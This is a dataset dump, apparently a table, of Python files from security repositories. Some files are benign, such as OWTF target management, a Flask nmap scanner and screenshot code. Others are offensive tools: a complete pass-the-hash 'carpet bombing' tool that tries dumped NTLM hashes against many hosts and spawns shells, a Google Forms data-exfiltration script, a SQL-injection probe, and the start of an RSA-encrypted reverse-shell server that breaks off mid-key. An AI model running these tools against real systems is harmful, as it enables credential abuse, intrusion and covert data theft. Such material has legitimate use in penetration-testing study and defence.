repo_name
stringclasses 29
values | text
stringlengths 18
367k
| avg_line_length
float64 5.6
132
| max_line_length
int64 11
3.7k
| alphnanum_fraction
float64 0.28
0.94
|
---|---|---|---|---|
PenetrationTestingScripts | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author : jeffzhang
# @Time : 18-5-17
# @File : port_scanner.py
# @Desc : ""
import threading
import time
from flask import Blueprint, render_template, request, redirect, url_for, jsonify
from bson import ObjectId
from lib.mongo_db import connectiondb, db_name_conf
from fuxi.views.authenticate import login_check
from fuxi.views.modules.port_scanner.nmap_scanner import nmap_scanner
from instance import config_name
port_scanner = Blueprint('port_scanner', __name__)
config_db = db_name_conf()['config_db']
port_db = db_name_conf()['port_db']
# port_scanner
@port_scanner.route('/port-scanner', methods=['GET', 'POST'])
@login_check
def port_view():
if request.method == "GET":
if request.args.get("scan_id"):
# default port scan result
target_id = request.args.get("scan_id")
db_course = connectiondb(port_db).find_one({"_id": ObjectId(target_id)})
host = db_course['host']
port = db_course['port']
if db_course['status'] == "Done":
result = '\n'.join('%s' % c for c in db_course['detail']).replace(';', " ")
else:
result = "Scanning, Please wait..."
return render_template('port-scanner.html', host=host, result=result, port=port)
elif request.args.get("result"):
# table view port scan result
scan_id = request.args.get("result")
db_course = connectiondb(port_db).find_one({"_id": ObjectId(scan_id)})
result = '\n'.join('%s' % c for c in db_course['detail'])
return result
elif request.args.get('delete'):
# scan task delete
scan_id = request.args.get("delete")
connectiondb(port_db).delete_one({"_id": ObjectId(scan_id)})
return redirect(url_for('port_scanner.port_view'))
# default scan view
port_list = connectiondb(config_db).find_one({"config_name": config_name})['port_list']
ports = ','.join('%s' % port for port in port_list)
return render_template('port-scanner.html', port_list=ports)
else:
# add scan
if request.form.get('source') == "new_scan":
target_val = request.form.get('target_val')
arguments_val = int(request.form.get('arguments_val'))
port_val = request.form.get('port_val')
if len(port_val) > 0:
if arguments_val == 0:
arguments = "-sT -T4 -p " + port_val
elif arguments_val == 1:
arguments = "-sT -T4 --open -p " + port_val
elif arguments_val == 2:
arguments = "-sS -T4 -Pn -p " + port_val
elif arguments_val == 3:
arguments = "-sT -sV -O -A -p " + port_val
else:
arguments = ""
# use default port
else:
if arguments_val == 0:
arguments = "-sT -T4"
elif arguments_val == 1:
arguments = "-sT -T4 --open"
elif arguments_val == 2:
arguments = "-sS -T4 -Pn "
elif arguments_val == 3:
arguments = "-sT -sV -O -A"
else:
arguments = ""
db_data = {
"host": target_val,
"status": "Preparation",
'port': port_val,
"arguments": arguments,
'detail': "",
'date': time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
}
scan_id = connectiondb(port_db).insert_one(db_data).inserted_id
t1 = threading.Thread(target=nmap_scanner, args=(target_val, arguments, scan_id))
t1.start()
return jsonify({
"result": "success",
"scan_id": str(scan_id),
})
| 40.010309 | 95 | 0.515212 |
cybersecurity-penetration-testing | __author__ = 'Preston Miller & Chapin Bryce'
import csv_writer
import kml_writer
import xlsx_writer
| 16 | 44 | 0.752475 |
cybersecurity-penetration-testing | #!/usr/bin/python
#
# Simple script intended to perform Carpet Bombing against list
# of provided machines using list of provided LSA Hashes (LM:NTLM).
# The basic idea with Pass-The-Hash attack is to get One hash and use it
# against One machine. There is a problem with this approach of not having information,
# onto what machine we could have applied the hash.
# To combat this issue - the below script was born.
#
# Requirements:
# This script requires 'pth-winexe' utility (or winexe renamed to pth-winexe') be present
# within system during script's invocation. In case this utility will not be present -
# no further check upon ability to run commands from PTH attack - will be displayed.
# Also, modules such as:
# - impacket
#
# Notice:
# This script is capable of verifying exploitability of only Windows boxes. In case
# of other type of boxes (running Samba) pth-winexe will not yield satisfying results.
#
# Usage:
# $ ./pth-carpet.py machines.txt pwdump
#
# coded by:
# Mariusz Banach, 2016 / mgeeky
# version 0.2
#
# Should be working on Windows boxes as well as on Linux ones.
#
from __future__ import print_function
import os
import sys
import argparse
import signal
import logging
import threading
import subprocess
import multiprocessing
from termcolor import colored
from functools import partial
from multiprocessing.managers import BaseManager
from impacket.dcerpc.v5 import transport
WORKERS = multiprocessing.cpu_count() * 4
TIMEOUT = 10
OPTIONS = None
LOCK = multiprocessing.Lock()
def info(txt):
with LOCK:
print (txt)
def success(txt):
info(colored('[+] '+txt, 'green', attrs=['bold']))
def warning(txt):
info(colored('[*] '+txt, 'yellow'))
def verbose(txt):
if OPTIONS.v:
info(colored('[?] '+txt, 'white'))
def err(txt):
info(colored('[!] '+txt, 'red'))
class Command(object):
def __init__(self, cmd):
self.cmd = cmd
self.process = None
self.output = ''
self.error = ''
verbose( '\tCalling: "%s"' % cmd)
def get_output(self):
return self.output, self.error
def run(self, stdin, timeout):
def target():
self.process = subprocess.Popen(self.cmd, shell=True, \
stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
self.output, self.error = self.process.communicate(stdin)
thread = threading.Thread(target=target)
thread.start()
thread.join(timeout)
if thread.is_alive():
self.process.terminate()
thread.join()
return False
else:
return True
def init_worker():
# http://stackoverflow.com/a/6191991
signal.signal(signal.SIGINT, signal.SIG_IGN)
def cmd_exists(cmd):
return subprocess.call("type " + cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) == 0
def check_rce(host, username, hash, port):
verbose('\tChecking whether provided hash can be used to PTH remote code execution')
if cmd_exists('pth-winexe'):
userswitch = '%s%%%s' % (username, hash)
c = Command('pth-winexe -U %s //%s cmd' % (userswitch, host))
if c.run('exit\n', TIMEOUT):
pass
else:
verbose('\tPTH-Winexe had to be terminated.')
out, error = c.get_output()
if 'Microsoft' in out and '(C) Copyright' in out and '[Version' in out:
return True
else:
errorm = error[error.find('NT_STATUS'):].strip()
if not errorm.startswith('NT_STATUS'):
if 'NT_STATUS' in error:
errorm = error
else:
errorm = 'Unknown error'
if OPTIONS.v:
err('\tCould not spawn shell using PTH: ' + errorm)
else:
warning('\tPlease check above hash whether using it you can access writeable $IPC share to execute cmd.')
return False
def login(host, username, hash, port):
stringbinding = 'ncacn_np:%s[\pipe\svcctl]' % host
rpctransport = transport.DCERPCTransportFactory(stringbinding)
rpctransport.set_dport(port)
lmhash, nthash = hash.split(':')
rpctransport.set_credentials(username, '', '', lmhash, nthash, None)
dce = rpctransport.get_dce_rpc()
try:
dce.connect()
return check_rce(host, username, hash, port)
except Exception, e:
raise e
def correct_hash(hash):
lmhash, nthash = hash.split(':')
if '*' in lmhash:
lmhash = '0' * 32
if '*' in nthash:
nthash = '0' * 32
return lmhash + ':' + nthash
def worker(stopevent, pwdump, machine):
for user, hash in pwdump.items():
if stopevent.is_set():
break
hash = correct_hash(hash)
try:
if login(machine, user, hash, OPTIONS.port):
success('Pass-The-Hash with shell spawned: %s@%s (%s)' % (user, machine, hash))
else:
if OPTIONS.v:
warning('Connected using PTH but could\'nt spawn shell: %s@%s (%s)' % (user, machine, hash))
except Exception, e:
verbose('Hash was not accepted: %s@%s (%s)\n\t%s' % (user, machine, hash, str(e)))
def main():
global OPTIONS
print(colored('\n\tPass-The-Hash Carpet Bombing utility\n\tSmall utility trying every provided hash against every specified machine.\n\tMariusz Banach, 2016\n', 'white', attrs=['bold']))
parser = argparse.ArgumentParser(add_help = True, description='Pass-The-Hash mass checking tool')
parser.add_argument('rhosts', nargs='?', help='Specifies input file containing list of machines or CIDR notation of hosts')
parser.add_argument('hashes', nargs='?', help='Specifies input file containing list of dumped hashes in pwdump format')
parser.add_argument('-v', action='store_true', help='Verbose mode')
parser.add_argument('-port', choices=['139', '445'], nargs='?', default='445', metavar='smb port', help='Destination port used to connect into SMB Server')
if len(sys.argv) < 3:
parser.print_help()
sys.exit(1)
OPTIONS = parser.parse_args()
machines = [x.strip() for x in open(OPTIONS.rhosts).readlines() ]
rawpwdump = [x.strip() for x in open(OPTIONS.hashes).readlines() ]
pwdump = {}
for p in rawpwdump:
try:
user = p.split(':')[0]
hash = p.split(':')[2] + ':' + p.split(':')[3]
except:
err('Supplied hashes file does not conform PWDUMP format!')
err('\tIt must be like this: <user>:<id>:<lmhash>:<nthash>:...')
sys.exit(1)
pwdump[user] = hash
warning('Testing %d hashes against %d machines. Resulting in total in %d PTH attempts\n' \
% (len(pwdump), len(machines), len(pwdump) * len(machines)))
stopevent = multiprocessing.Manager().Event()
try:
pool = multiprocessing.Pool(WORKERS, init_worker)
func = partial(worker, stopevent, pwdump)
pool.map_async(func, machines)
pool.close()
pool.join()
except KeyboardInterrupt:
pool.terminate()
pool.join()
success('\nUser interrupted the script.')
if __name__ == '__main__':
main() | 31.707207 | 190 | 0.619972 |
Hands-On-Penetration-Testing-with-Python | #! /usr/bin/python3.5
def main():
num_1=input("Enter First number : ")
num_2=input("Enter Second number : ")
sum_=num_1+num_2
print("Sum is : "+str(sum_))
print("Surprised !! ,input() returns String")
print("Actuall sum : " +str(int(num_1)+int(num_2)))
main()
| 19.769231 | 52 | 0.620818 |
owtf | """
owtf.managers.target
~~~~~~~~~~~~~~~~~~~~
"""
import logging
import os
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse
from owtf.db.session import get_count, get_scoped_session
from owtf.lib.exceptions import (
DBIntegrityException,
InvalidParameterType,
InvalidTargetReference,
UnresolvableTargetException,
)
from owtf.models.command import Command
from owtf.models.session import Session
from owtf.models.target import Target
from owtf.managers.session import add_target_to_session, session_required
from owtf.plugin.params import plugin_params
from owtf.settings import OUTPUT_PATH
from owtf.utils.file import (
cleanup_target_dirs,
create_output_dir_target,
get_target_dir,
)
from owtf.utils.ip import get_ip_from_hostname, get_ips_from_hostname
from owtf.utils.strings import str2bool, to_str
TARGET_CONFIG = {
"id": 0,
"target_url": "",
"host_name": "",
"host_path": "",
"url_scheme": "",
"port_number": "", # In str form
"host_ip": "",
"alternative_ips": "", # str(list), so it can easily reversed using list(str)
"ip_url": "",
"top_domain": "",
"top_url": "",
"scope": True,
"max_user_rank": -1,
"max_owtf_rank": -1,
}
PATH_CONFIG = {
"partial_url_output_path": "",
"host_output": "",
"port_output": "",
"url_output": "",
"plugin_output_dir": "",
}
def target_required(func):
"""
In order to use this decorator on a `method` there are two requirements
+ target_id must be a kwarg of the function
+ Core must be attached to the object at Core
All this decorator does is check if a valid value is passed for target_id
if not get the target_id from target manager and pass it
"""
def wrapped_function(*args, **kwargs):
if "target_id" not in kwargs:
kwargs["target_id"] = target_manager.get_target_id
return func(*args, **kwargs)
return wrapped_function
@target_required
def command_already_registered(session, original_command, target_id=None):
"""Checks if the command has already been registered
:param original_command: Original command to check
:type original_command: `dict`
:param target_id: Target ID
:type target_id: `int`
:return: None
:rtype: None
"""
from owtf.managers.poutput import plugin_output_exists
if target_id is not None:
target_manager.set_target(target_id)
register_entry = session.query(Command).get(original_command)
if register_entry:
# If the command was completed and the plugin output to which it
# is referring exists
if register_entry.success:
if plugin_output_exists(
session, register_entry.plugin_key, register_entry.target_id
):
return get_target_url_for_id(session, register_entry.target_id)
else:
Command.delete_cmd(session, original_command)
return None
else: # Command failed
Command.delete_cmd(session, original_command)
return get_target_url_for_id(session, register_entry.target_id)
return None
class TargetManager(object):
# All these variables reflect to current target which is referenced by a unique ID
target_id = None
target_config = dict(TARGET_CONFIG)
path_config = dict(PATH_CONFIG)
def __init__(self):
self.session = get_scoped_session()
def set_target(self, target_id):
"""Set a target by ID
:param target_id: target ID
:type target_id: `int`
:return: None
:rtype: None
"""
try:
self.target_id = target_id
self.target_config = get_target_config_by_id(self.session, target_id)
self.path_config = self.get_path_configs(self.target_config)
except InvalidTargetReference:
raise InvalidTargetReference(
"0. Target doesn't exist: {!s}".format(target_id)
)
def get_path_configs(self, target_config):
"""Get paths to output directories
:param target_config: Target config
:type target_config: `dict`
:return: Path config
:rtype: `dict`
"""
path_config = {}
# Set the output directory.
path_config["host_output"] = os.path.join(OUTPUT_PATH, target_config["host_ip"])
path_config["port_output"] = os.path.join(
path_config["host_output"], target_config["port_number"]
)
# Set the URL output directory (plugins will save their data here).
path_config["url_output"] = os.path.join(
get_target_dir(target_config["target_url"])
)
# Set the partial results path.
path_config["partial_url_output_path"] = os.path.join(
path_config["url_output"], "partial"
)
return path_config
@property
def get_target_id(self):
"""Return target ID
:return: target ID
:rtype: `int`
"""
return self.target_id
def get_val(self, key):
"""Get value of the key from target config
:param key: Key
:type key: `str`
:return: Value
:rtype: `str` #?
"""
return self.target_config[key]
def get_target_url(self):
"""Return target URL
:return: Target URL
:rtype: `str`
"""
return self.get_val("target_url")
def get_target_urls(self):
"""Return target URLs
:return: List of target urls
:rtype: `list`
"""
return get_all_targets(self.session, "target_url")
@property
def get_target_config(self):
"""Return target config
:return: Target config
:rtype: `dict`
"""
return self.target_config
@property
def get_path_config(self):
"""Return path config
:return: Path config
:rtype: `dict`
"""
return self.path_config
def get_path(self, output_type):
return self.path_config.get(output_type, None)
def set_path(self, output_type, path):
# Mainly used for setting output paths for individual plugins, which
# need not be saved: plugin_output_dir.
self.path_config[output_type] = path
@session_required
def add_target(session, target_url, session_id=None):
"""Adds a target to session
:param target_url: Target url
:type target_url: `str`
:param session_id: session ID
:type session_id: `int`
:return: None
:rtype: None
"""
if target_url not in get_all_targets(session, "target_url"):
# A try-except can be used here, but then ip-resolution takes time
# even if target is present
target_config = derive_config_from_url(target_url)
config_obj = Target(target_url=target_url)
config_obj.host_name = target_config["host_name"]
config_obj.host_path = target_config["host_path"]
config_obj.url_scheme = target_config["url_scheme"]
config_obj.port_number = target_config["port_number"]
config_obj.host_ip = target_config["host_ip"]
config_obj.alternative_ips = str(target_config["alternative_ips"])
config_obj.ip_url = target_config["ip_url"]
config_obj.top_domain = target_config["top_domain"]
config_obj.top_url = target_config["top_url"]
session.add(config_obj)
config_obj.sessions.append(session.query(Session).get(session_id))
session.commit()
target_id = config_obj.id
create_missing_dirs_target(target_url)
target_manager.set_target(target_id)
else:
session_obj = session.query(Session).get(session_id)
target_obj = session.query(Target).filter_by(target_url=target_url).one()
if session_obj in target_obj.sessions:
raise DBIntegrityException(
"{!s} already present in Target DB & session".format(target_url)
)
else:
add_target_to_session(session, target_obj.id, session_id=session_obj.id)
@session_required
def add_targets(session, target_urls, session_id=None):
"""Add multiple targets
:param target_urls: List of target urls
:type target_urls: `list`
:param session_id: session ID
:type session_id: `int`
:return: None
:rtype: None
"""
for target_url in target_urls:
add_target(session, to_str(target_url), session_id=session_id)
def update_target(session, data_dict, target_url=None, id=None):
"""Update a target in the DB
:param data_dict: Modified data
:type data_dict: `dict`
:param target_url: Target url
:type target_url: `str`
:param id: Target ID
:type id: `int`
:return: None
:rtype: None
"""
target_obj = None
if id:
target_obj = session.query(Target).get(id)
if target_url:
target_obj = session.query(Target).filter_by(target_url=target_url).one()
if not target_obj:
raise InvalidTargetReference(
"2. Target doesn't exist: {!s}".format(id) if id else str(target_url)
)
# TODO: Updating all related attributes when one attribute is changed
if data_dict.get("scope", None) is not None:
target_obj.scope = str2bool(data_dict.get("scope", None))
session.commit()
def delete_target(session, target_url=None, id=None):
"""Delete a target from DB
:param target_url: target URL
:type target_url: `str`
:param id: Target ID
:type id: `int`
:return: None
:rtype: None
"""
target_obj = None
if id:
target_obj = session.query(Target).get(id)
if target_url:
target_obj = session.query(Target).filter_by(target_url=target_url).one()
if not target_obj:
raise InvalidTargetReference(
"3. Target doesn't exist: {!s}".format(id) if id else str(target_url)
)
if target_obj:
target_url = target_obj.target_url
session.delete(target_obj)
session.commit()
cleanup_target_dirs(target_url)
def create_missing_dirs_target(target_url):
"""Creates missing output dirs for target
:param target_url: Target URL
:type target_url: `str`
:return: None
:rtype: None
"""
create_output_dir_target(target_url)
def get_target_url_for_id(session, id):
"""Get target URL by target ID
:param id: target ID
:type id: `int`
:return: Target url
:rtype: `str`
"""
target_obj = session.query(Target).get(id)
if not target_obj:
logging.info("Failing with ID: %s" % str(id))
raise InvalidTargetReference("1. Target doesn't exist with ID: {!s}".format(id))
return target_obj.target_url
def get_target_config_by_id(session, id):
"""Get target config by id
:param id: Target id
:type id: `int`
:return: Config dict
:rtype: `dict`
"""
target_obj = session.query(Target).get(id)
if not target_obj:
raise InvalidTargetReference("5. Target doesn't exist: {!s}".format(id))
return get_target_config_dict(target_obj)
def target_gen_query(session, filter_data, session_id, for_stats=False):
"""Generate query
:param filter_data: Filter data
:type filter_data: `dict`
:param session_id: session ID
:type session_id: `int`
:param for_stats: true/false
:type for_stats: `bool`
:return:
:rtype:
"""
query = session.query(Target).filter(Target.sessions.any(id=session_id))
if filter_data.get("search") is not None:
if filter_data.get("target_url", None):
if isinstance(filter_data.get("target_url"), list):
filter_data["target_url"] = filter_data["target_url"][0]
query = query.filter(
Target.target_url.like("%%{!s}%%".format(filter_data["target_url"]))
)
else:
if filter_data.get("target_url", None):
if isinstance(filter_data["target_url"], str):
query = query.filter_by(target_url=filter_data["target_url"])
if isinstance(filter_data["target_url"], list):
query = query.filter(
Target.target_url.in_(filter_data.get("target_url"))
)
if filter_data.get("host_ip", None):
if isinstance(filter_data["host_ip"], str):
query = query.filter_by(host_ip=filter_data["host_ip"])
if isinstance(filter_data["host_ip"], list):
query = query.filter(Target.host_ip.in_(filter_data.get("host_ip")))
if filter_data.get("scope", None):
filter_data["scope"] = filter_data["scope"][0]
query = query.filter_by(scope=str2bool(filter_data.get("scope")))
if filter_data.get("host_name", None):
if isinstance(filter_data["host_name"], str):
query = query.filter_by(host_name=filter_data["host_name"])
if isinstance(filter_data["host_name"], list):
query = query.filter(Target.host_name.in_(filter_data.get("host_name")))
if filter_data.get("id", None):
if isinstance(filter_data["id"], str):
query = query.filter_by(id=filter_data["id"])
if isinstance(filter_data["id"], list):
query = query.filter(Target.id.in_(filter_data.get("id")))
# This will allow new targets to be at the start
query = query.order_by(Target.id.desc())
if not for_stats: # query for stats shouldn't have limit and offset
try:
if filter_data.get("offset", None):
if isinstance(filter_data.get("offset"), list):
filter_data["offset"] = filter_data["offset"][0]
query = query.offset(int(filter_data["offset"]))
if filter_data.get("limit", None):
if isinstance(filter_data.get("limit"), list):
filter_data["limit"] = filter_data["limit"][0]
if int(filter_data["limit"]) != -1:
query = query.limit(int(filter_data["limit"]))
except ValueError:
raise InvalidParameterType(
"Invalid parameter type for target db for id[lt] or id[gt]"
)
return query
@session_required
def search_target_configs(session, filter_data=None, session_id=None):
"""Three things needed
+ Total number of targets
+ Filtered target dicts
+ Filtered number of targets
:param filter_data: Filter data
:type filter_data: `dict`
:param session_id: session id
:type session_id: `int`
:return: results
:rtype: `dict`
"""
total = get_count(session.query(Target).filter(Target.sessions.any(id=session_id)))
filtered_target_objs = target_gen_query(session, filter_data, session_id).all()
filtered_number = get_count(
target_gen_query(session, filter_data, session_id, for_stats=True)
)
results = {
"records_total": total,
"records_filtered": filtered_number,
"data": get_target_configs(filtered_target_objs),
}
return results
@session_required
def get_target_config_dicts(session, filter_data=None, session_id=None):
"""Get list of target config dicts
:param filter_data: Filter criteria
:type filter_data: `dict`
:param session_id: session ID
:type session_id: `int`
:return: List of target config dicts
:rtype: `list`
"""
if filter_data is None:
filter_data = {}
target_obj_list = target_gen_query(
session=session, filter_data=filter_data, session_id=session_id
).all()
return get_target_configs(target_obj_list)
def get_target_config_dict(target_obj):
"""Gets target config as a dict from object
:param target_obj: target object
:type target_obj:
:return: Target config
:rtype: `dict`
"""
target_config = dict(TARGET_CONFIG)
if target_obj:
for key in list(TARGET_CONFIG.keys()):
target_config[key] = getattr(target_obj, key)
return target_config
return None
def get_target_configs(target_obj_list):
"""Get target list of configs
:param target_obj_list: Target object list
:type target_obj_list: `list`
:return: List of target configs
:rtype: `list`
"""
target_configs = []
for target_obj in target_obj_list:
target_configs.append(get_target_config_dict(target_obj))
return target_configs
def get_targets_as_list(key_list):
"""Get everything as list
:param key_list: Target key list
:type key_list: `list`
:return: Values list
:rtype: `list`
"""
session = get_scoped_session()
values = []
for key in key_list:
values.append(get_all_targets(session, key))
return values
def get_all_targets(session, key):
"""Get all targets by key
:param key: Target key
:type key: `str`
:return:
:rtype:
"""
results = session.query(getattr(Target, key.lower())).all()
results = [result[0] for result in results]
return results
def get_all_in_scope(key):
"""Get all targets in scope by key
:param key: Key
:type key: `str`
:return: List of target keys
:rtype: `list`
"""
session = get_scoped_session()
results = session.query(getattr(Target, key.lower())).filter_by(scope=True).all()
results = [result[0] for result in results]
return results
def is_url_in_scope(url):
"""To avoid following links to other domains.
:param url: URL to check
:type url: `str`
:return: True if in scope
:rtype: `bool`
"""
parsed_url = urlparse(url)
# Get all known Host Names in Scope.
for host_name in get_all_in_scope(key="host_name"):
if parsed_url.hostname == host_name:
return True
return False
def load_targets(session, options):
"""Load targets into the DB
:param options: User supplied arguments
:type options: `dict`
:return: Added targets
:rtype: `list`
"""
scope = options["scope"]
if options["plugin_group"] == "auxiliary":
scope = get_aux_target()
added_targets = []
for target in scope:
try:
add_target(session=session, target_url=target)
added_targets.append(target)
except DBIntegrityException:
logging.warning("%s already exists in DB", target)
added_targets.append(target)
except UnresolvableTargetException as e:
logging.error("%s", e.parameter)
return added_targets
def get_aux_target():
"""This function returns the target for auxiliary plugins from the parameters provided
:param options: User supplied arguments
:type options: `dict`
:return: List of targets for aux plugins
:rtype: `list`
"""
# targets can be given by different params depending on the aux plugin we are running
# so "target_params" is a list of possible parameters by which user can give target
target_params = ["RHOST", "TARGET", "SMB_HOST", "BASE_URL", "SMTP_HOST"]
targets = None
if plugin_params.process_args():
for param in target_params:
if param in plugin_params.args:
targets = plugin_params.args[param]
break # it will capture only the first one matched
repeat_delim = ","
if targets is None:
logging.error(
"Aux target not found! See your plugin accepted parameters in ./plugins/ folder"
)
return []
if "REPEAT_DELIM" in plugin_params.args:
repeat_delim = plugin_params.args["REPEAT_DELIM"]
return targets.split(repeat_delim)
else:
return []
@session_required
def get_targets_by_severity_count(session, session_id=None):
"""Get targets by severity count
:param session_id: session ID
:type session_id: `int`
:return: data
:rtype: `dict`
"""
filtered_severity_objs = []
# "not ranked" = gray, "passing" = light green, "info" = light sky blue, "low" = blue, medium = yellow,
# high = red, critical = dark purple
severity_frequency = [
{"id": 0, "label": "Not Ranked", "value": 0, "color": "#A9A9A9"},
{"id": 1, "label": "Passing", "value": 0, "color": "#32CD32"},
{"id": 2, "label": "Info", "value": 0, "color": "#b1d9f4"},
{"id": 3, "label": "Low", "value": 0, "color": "#337ab7"},
{"id": 4, "label": "Medium", "value": 0, "color": "#ffcc00"},
{"id": 5, "label": "High", "value": 0, "color": "#c12e2a"},
{"id": 6, "label": "Critical", "value": 0, "color": "#800080"},
]
total = session.query(Target).filter(Target.sessions.any(id=session_id)).count()
target_objs = session.query(Target).filter(Target.sessions.any(id=session_id)).all()
for target_obj in target_objs:
if target_obj.max_user_rank != -1:
severity_frequency[target_obj.max_user_rank + 1]["value"] += 100 / total
else:
severity_frequency[target_obj.max_owtf_rank + 1]["value"] += 100 / total
for severity in severity_frequency:
if severity["value"] != 0:
filtered_severity_objs.append(severity)
return {"data": filtered_severity_objs}
def derive_config_from_url(target_url):
"""Automatically find target information based on target name.
.. note::
If target does not start with 'http' or 'https', then it is considered as a network target.
:param target_URL: Target url supplied
:type target_URL: `str`
:return: Target config dictionary
:rtype: `dict`
"""
target_config = dict(TARGET_CONFIG)
target_config["target_url"] = target_url
try:
parsed_url = urlparse(target_url)
if (
not parsed_url.hostname and not parsed_url.path
): # No hostname and no path, urlparse failed.
raise ValueError
except ValueError: # Occurs sometimes when parsing invalid IPv6 host for instance
raise UnresolvableTargetException("Invalid hostname '{!s}'".format(target_url))
host = parsed_url.hostname
if not host: # Happens when target is an IP (e.g. 127.0.0.1)
host = parsed_url.path # Use the path as host (e.g. 127.0.0.1 => host = '' and path = '127.0.0.1')
host_path = host
else:
host_path = parsed_url.hostname + parsed_url.path
url_scheme = parsed_url.scheme
protocol = parsed_url.scheme
if parsed_url.port is None: # Port is blank: Derive from scheme (default port set to 80).
try:
host, port = host.rsplit(":")
except ValueError: # Raised when target doesn't contain the port (e.g. google.fr)
port = "80"
if "https" == url_scheme:
port = "443"
else: # Port found by urlparse.
port = str(parsed_url.port)
# Needed for google resource search.
target_config["host_path"] = host_path
# Some tools need this!
target_config["url_scheme"] = url_scheme
# Some tools need this!
target_config["port_number"] = port
# Set the top URL.
target_config["host_name"] = host
host_ip = get_ip_from_hostname(host)
host_ips = get_ips_from_hostname(host)
target_config["host_ip"] = host_ip
target_config["alternative_ips"] = host_ips
ip_url = target_config["target_url"].replace(host, host_ip)
target_config["ip_url"] = ip_url
target_config["top_domain"] = target_config["host_name"]
hostname_chunks = target_config["host_name"].split(".")
if target_config["target_url"].startswith(
("http", "https")
): # target considered as hostname (web plugins)
if not target_config["host_name"] in target_config["alternative_ips"]:
target_config["top_domain"] = ".".join(hostname_chunks[1:])
# Set the top URL (get "example.com" from "www.example.com").
target_config["top_url"] = "{0}://{1}:{2}".format(protocol, host, port)
else: # target considered as IP (net plugins)
target_config["top_domain"] = ""
target_config["top_url"] = ""
return target_config
# Define the service
target_manager = TargetManager()
| 31.987738 | 107 | 0.61073 |
Python-for-Offensive-PenTest | '''
Caution
--------
Using this script for any malicious purpose is prohibited and against the law. Please read Google terms and conditions carefully.
Use it on your own risk.
'''
# Python For Offensive PenTest
# Interacting with Google Forms
import requests # To install requests library, just type on the CMD: pip install requests
url = 'https://docs.google.com/forms/d/1Ndjnm5YViqIYXyIuoTHsCqW_YfGa-vaaKEahY2cc5cs/formResponse' # please replace the URL with your own google form :D
'''
notice that i added /formResponse to the end of the URL and this is inherited from the page HTML source code,
as we can see below, the HTML form action contains /formResponse when method POST is used to send the user data
so we have to add this part when we automate the data submission
<div class="ss-form"><form action="https://docs.google.com/forms/d/1Ndjnm5YViqIYXyIuoTHsCqW_YfGa-vaaKEahY2cc5cs/formResponse?pli=1"
method="POST" id="ss-form" target="_self" onsubmit=""><ol role="list" class="ss-question-list" style="padding-left: 0">
'''
form_data = {'entry.1542374001':'Hello from Python'}
'''
the textarea form name [which is entry.1301128713] can be taken from the HTML source code as you can see from the below line,
please check the video for more info.
<textarea name="entry.1301128713" rows="8" cols="0" class="ss-q-long" id="entry_1301128713" dir="auto" aria-label="Isn't Python awesome?? "></textarea>
Note: the key (entry.1301128713) will vary on your google form, make sure you change it.
'''
r = requests.post(url, data=form_data)
# Submitting form-encoded data in requests:-
# http://docs.python-requests.org/en/latest/user/quickstart/#more-complicated-post-requests
| 36.108696 | 156 | 0.747362 |
cybersecurity-penetration-testing | import sys
import time
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from PyQt4.QtWebKit import *
class Screenshot(QWebView):
def __init__(self):
self.app = QApplication(sys.argv)
QWebView.__init__(self)
self._loaded = False
self.loadFinished.connect(self._loadFinished)
def wait_load(self, delay=0):
while not self._loaded:
self.app.processEvents()
time.sleep(delay)
self._loaded = False
def _loadFinished(self, result):
self._loaded = True
def get_image(self, url):
self.load(QUrl(url))
self.wait_load()
frame = self.page().mainFrame()
self.page().setViewportSize(frame.contentsSize())
image = QImage(self.page().viewportSize(), QImage.Format_ARGB32)
painter = QPainter(image)
frame.render(painter)
painter.end()
return image
s = Screenshot()
image = s.get_image('http://www.packtpub.com')
image.save('website.png')
| 25 | 72 | 0.609082 |
cybersecurity-penetration-testing | import sys
def main():
"""
The main function uses sys.argv list to print any user supplied input.
:return: Nothing.
"""
args = sys.argv
print 'Script:', args[0]
args.pop(0)
for i, argument in enumerate(sys.argv):
print 'Argument {}: {}'.format(i, argument)
print 'Type: {}'.format(type(argument))
if __name__ == '__main__':
main() | 22.705882 | 75 | 0.547264 |
Python-Penetration-Testing-for-Developers | import requests
url = "http://127.0.0.1/SQL/sqli-labs-master/Less-1/index.php?id="
initial = "'"
print "Testing "+ url
first = requests.post(url+initial)
if "mysql" in first.text.lower():
print "Injectable MySQL detected"
elif "native client" in first.text.lower():
print "Injectable MSSQL detected"
elif "syntax error" in first.text.lower():
print "Injectable PostGRES detected"
elif "ORA" in first.text.lower():
print "Injectable Oracle detected"
else:
print "Not Injectable :( " | 27.823529 | 66 | 0.725971 |
Python-for-Offensive-PenTest | # Python For Offensive PenTest
# Download Pycrypto for Windows - pycrypto 2.6 for win32 py 2.7
# http://www.voidspace.org.uk/python/modules.shtml#pycrypto
# Download Pycrypto source
# https://pypi.python.org/pypi/pycrypto
# For Kali, after extract the tar file, invoke "python setup.py install"
# Generate Keys
from Crypto.PublicKey import RSA
new_key = RSA.generate(4096 ) # generate RSA key that 4096 bits long
#Export the Key in PEM format, the PEM extension contains ASCII encoding
public_key = new_key.publickey().exportKey("PEM")
private_key = new_key.exportKey("PEM")
print private_key
print public_key
| 27.272727 | 72 | 0.756844 |
Python-for-Offensive-PenTest | # Python For Offensive PenTest
# Download Pycrypto for Windows - pycrypto 2.6 for win32 py 2.7
# http://www.voidspace.org.uk/python/modules.shtml#pycrypto
# Download Pycrypto source
# https://pypi.python.org/pypi/pycrypto
# For Kali, after extract the tar file, invoke "python setup.py install"
# RSA - Server- TCP Reverse Shell
import socket
from Crypto.PublicKey import RSA
def encrypt(message):
#Remember that here we define the target's public key
publickey ='''-----BEGIN PUBLIC KEY-----
MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAms5mJkSBV9C4iPlyxugD
WyaryfJE/e4Z2AvgY9YsNWZasTPQ9gCVoGrfd3I9Efmd2wHJVnBxjL0aenjFV1fa
9hHINMOO0JRQo+2umyg+QMd+EdglA9MWaXUgNb8ADa+zKCT+0VbF92iAlAmAFii6
aY4jkVKSUBVGkmn94WNIYSVzHNSr5JcaPEthRpAAJE2lwjA4OIqpKUDnK/0rzlNl
QkSlBbN7ztEtfzjzI3dJo+i/VsOaS8LHfsk3nKX2GU95AM3LhpF2cMRgIJJCSU2s
